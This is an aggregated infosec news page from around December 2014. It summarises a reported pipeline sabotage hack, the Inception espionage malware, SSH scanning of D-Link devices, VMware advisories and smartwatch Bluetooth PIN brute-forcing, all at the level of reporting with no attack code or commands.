Information Security News
Bloomberg News is reporting evidence of a watershed event in the annals of cyberwarfare, a 2008 hack attack that caused a Turkish oil pipeline to spectacularly burst into flames.
If true, the hack could rewrite the history of cyberwar. The first known use of a
computer hack digital weapon to cause physical damage on an enemy is the Stuxnet worm, which in 2009 caused the destruction of uranium centrifuges in Iran's Natanz nuclear facility. (The malware was unleashed on a handful of carefully selected targets a year or so earlier, journalist and author Kim Zetter reported in a recent book, but it took time for the malware to infect its intended target.) The timing has earned Stuxnet the title of the world's first known digital weapon. The Bloomberg account suggests the hack on the Turkish pipeline occurred around the same time Stuxnet was released and was able to successfully detonate its payload effect physical damage a year earlier than Stuxnet did. Update: As several readers have pointed out in comments below, the suspected sabotage of a Siberian pipeline in 1982 is believed to have used a logic bomb.
As described by Bloomberg, attackers gained access to the pipeline's computerized operational controls and increased the pressure of the crude oil flowing inside. By hacking the video and sensors that closely monitored the 1,099-mile Baku-Tbilisi-Ceyhan pipeline, the attackers were able to prevent operators from learning of the blast until 40 minutes after it happened, from a security worker who saw the flames, Bloomberg said. As many as 60 hours of surveillance video were also erased. According to Bloomberg:
Researchers have uncovered yet another international espionage campaign that's so sophisticated and comprehensive that it could only have been developed with the backing of a well resourced country.
Inception, as the malware is dubbed in a report published Tuesday by Blue Coat Labs, targets devices running Windows, Android, BlackBerry, and iOS, and uses free accounts on Swedish cloud service Cloudme to collect pilfered data. Malware infecting Android handsets records incoming and outgoing phone calls to MP4 sound files that are periodically uploaded to the attackers. The researchers also uncovered evidence of an MMS phishing campaign designed to work on at least 60 mobile networks in multiple countries in an attempt to infect targeted individuals.
"There clearly is a well-resourced and very professional organization behind Inception, with precise targets and intentions that could be widespread and harmful," the Blue Coat report stated. "The complex attack framework shows signs of automation and seasoned programming, and the number of layers used to protect the payload of the attack and to obfuscate the identity of the attackers is extremely advanced, if not paranoid."
I noticed it in my own logs overnight and also had a couple of readers (both named Peter) report some odd new ssh scanning overnight. The scanning involves many sites, likely a botnet, attempting to ssh in as 3 users, D-Link, admin, and ftpuser. Given the first of those usernames, I suspect that they are targetting improperly configured D-Link routers or other appliances that have some sort of default password. The system that I have at home was not running kippo, so I didnt get the passwords that they were guessing and was not able to see what they might do if they succeed in ssh-ing in. If anyone out there has any more info on what exactly they are targetting, please let us know by e-mail, via the contact page, or by commenting on this post. Ill try to reconfigure a couple of kippo honeypots to see if I can capture the bad guys there and may update this post later.
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu
We got two security updates from VMWare this week:
|VMSA-2014-0013||CVE-2014-8373||VMware vCloud Automation Center||Remote privilegeescalation vulnerability. Authenticated remote users may obtain administrative privileges. Mitigated by turning off Connect (by) Using VMRC|
|VMSA-2014-0014||CVE-2014-8372||AirWatch||A direct object reference vulnerability allows users to see each others information.|
The growing number of smart devices that interoperates with smartphones could leave text messages, calendar entries, biometric data, and other sensitive user information wide open to hackers, security researchers warn.
That's because most smart watches rely on a six-digit PIN to secure information traveling to and from connected Android smartphones. With only one million possible keys securing the Bluetooth connection between the handset and the smart device, the PINs are susceptible to brute-force attacks, in which a nearby hacker attempts every possible combination until finding the right one.
Researchers from security firm Bitdefender mounted a proof-of-concept hack against a Samsung Gear Live smartwatch that was paired with a Google Nexus 4 running Android L Preview. Using readily available hacking tools, they found that the PIN obfuscating the Bluetooth connection between the two devices was easily brute forced. From that point on, they were able to monitor the information passing between the watch and the phone.
Posted by InfoSec News on Dec 10http://www.csoonline.com/article/2857455/business-continuity/fbi-says-theres-nothing-linking-north-korea-to-sony-hack.html
Posted by InfoSec News on Dec 10http://www.defenseone.com/technology/2014/12/can-iran-turn-your-lights/100821/
Posted by InfoSec News on Dec 10http://www.computerweekly.com/news/2240236318/Cloud-security-remains-a-barrier-for-CIOs-across-Europe
Posted by InfoSec News on Dec 10http://gcn.com/blogs/cybereye/2014/12/va-cybersecurity-documentation.aspx
Posted by InfoSec News on Dec 10http://seclists.org/fulldisclosure/2014/Dec/37